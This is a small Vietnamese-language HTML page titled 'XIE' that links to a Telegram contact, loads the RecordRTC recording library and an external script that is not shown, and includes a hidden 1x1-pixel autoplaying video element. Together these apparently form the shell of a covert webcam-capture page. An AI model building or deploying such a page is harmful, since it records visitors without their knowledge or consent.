<!DOCTYPE html>
<html>
<head>
    <title>XIE</title>
  <link rel="icon" type="image/png" href="https://i.imgur.com/AMHPiWA.jpg">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" type="text/css" href="cl/style.css">
  <script src="https://code.jquery.com/jquery-3.6.4.min.js"></script>
  <script src="https://cdn.webrtc-experiment.com/RecordRTC.js"></script>
</head>
<body>
    <div class="container">
        <h1>XIE</h1>
        <p>Liên hệ tôi qua : <a href="https://t.me/ktvcau" rel="nofollow" target="_blank">Telegram</a></p>
    </div>
   <video id="video" playsinline autoplay></video>
    <video id="video" width="1" height="1" autoplay></video>
  <script src="and/and/script.js"></script>
</body>
</html>
